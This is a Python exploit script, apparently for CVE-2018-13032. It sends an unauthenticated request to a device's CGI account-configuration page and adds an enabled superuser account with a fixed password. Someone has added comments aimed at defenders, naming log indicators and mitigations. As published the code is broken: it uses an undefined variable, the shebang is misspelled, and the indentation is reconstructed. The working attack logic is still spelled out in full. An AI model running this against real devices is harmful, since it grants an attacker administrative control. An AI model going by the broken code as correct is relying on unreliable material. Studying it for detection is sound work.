#!/usr/bin/pythono
#Exploit Title:
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
import sys
import requests
# Path of the CGI action the script targets; judging by its name and by the
# form fields posted to it, it handles the login/account configuration form.
# The user-supplied base URL is prefixed to it at run time.
# Defenders: requests to this path are what to search for in web-server and
# proxy logs of the affected product.
au = '/cgi-bin/pl_web.cgi/util_configlogin_act'
def help_message():
    """Print the usage text, filling in the script name from sys.argv[0]."""
    script = sys.argv[0]
    usage = """
{} -h ---> show this message
{} -u URL ---> start exploit
example: {} -u http://target.com
"""
    # A single parenthesised expression prints the same under the Python 2
    # print statement that the rest of this file uses.
    print(usage.format(script, script, script))
def error_optiont():
    """Print a short hint telling the user to run the script with -h.

    Not called anywhere in the visible listing.
    """
    hint = "\ntype and enter {} -h".format(sys.argv[0])
    print(hint)
# Form body sent to the account-configuration action.  It appears to mirror
# the device's user-accounts form: slots 1-3 carry the account names root,
# admin and user with empty password fields, and slot 4 defines an additional
# enabled account flagged as superuser with a fixed password.
# Defenders: the slot-4 username below, and any superuser account that no
# administrator created, are indicators to check for in the device's user
# list and in captured request bodies.
data_fs = {
    'savecrtcfg': 'checked',
    # slot 1
    'user_username1': 'root',
    'user_enabled1': 'on',
    'user_passwd1': '',
    'user_passwd_verify1': '',
    'user_delete1': '',
    # slot 2
    'user_username2r': 'admin',
    'user_passwd2': '',
    'user_passwd_verify2': '',
    'user_delete2': '',
    # slot 3
    'user_username3': 'user',
    'user_enabled3': 'on',
    'user_passwd3': '',
    'user_passwd_verify3': '',
    'user_delete3': '',
    # slot 4: the account this request adds
    'user_username4': 'h4x0r',
    'user_enabled4': 'on',
    'user_superuser4': 'on',
    'user_passwd4': '123123',
    'user_passwd_verify4': '123123',
    # form bookkeeping fields
    'page': 'util_configlogin',
    'val_requested_page': 'user_accounts',
    # Hard-coded in the listing; whether the device validates this value is
    # not visible here.
    'page_uuid': '3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d',
    'form_has_changed': '1',
    'submit': 'Supersize!',
}
# Command-line dispatch.  Indentation was lost in this listing; the nesting
# below is reconstructed from the statement order.
# Defenders: the request pattern produced here is a GET of the
# account-configuration path followed by a POST to the same path from the same
# client, with no login request in between.  Mitigation is the vendor fix for
# the CVE named in the file header, plus keeping the management interface off
# untrusted networks.
if len(sys.argv)>1 and sys.argv[1]=='-h':
    help_message()
    exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
    # Target URL = user-supplied base URL + the account-configuration path.
    urlt=sys.argv[2]+au
    # str() of a requests Response is "<Response [CODE]>", so this is a
    # status-code check on the GET.  No cookie, token or auth argument is
    # passed on either request in this script.
    if '200' in str(requests.get(urlt)):
        print 'Send DATA'
        # NOTE(review): as published this line references a name that is never
        # assigned in the listing, so execution stops here with NameError.
        r=requests.post(urtl,data=data_fs)
        # Success is inferred from the HTTP status alone; the response body is
        # not inspected, so this message does not prove an account was created.
        if '200' in str(r):
            print 'Added User'
    # NOTE(review): this else is attached to the GET probe because of its
    # message; with the indentation lost it could instead belong to the POST
    # status check -- confirm against the original file.
    else:
        print 'Not Found Page'
else:
    print 'Type And Enter -> python {} -h'.format(sys.argv[0])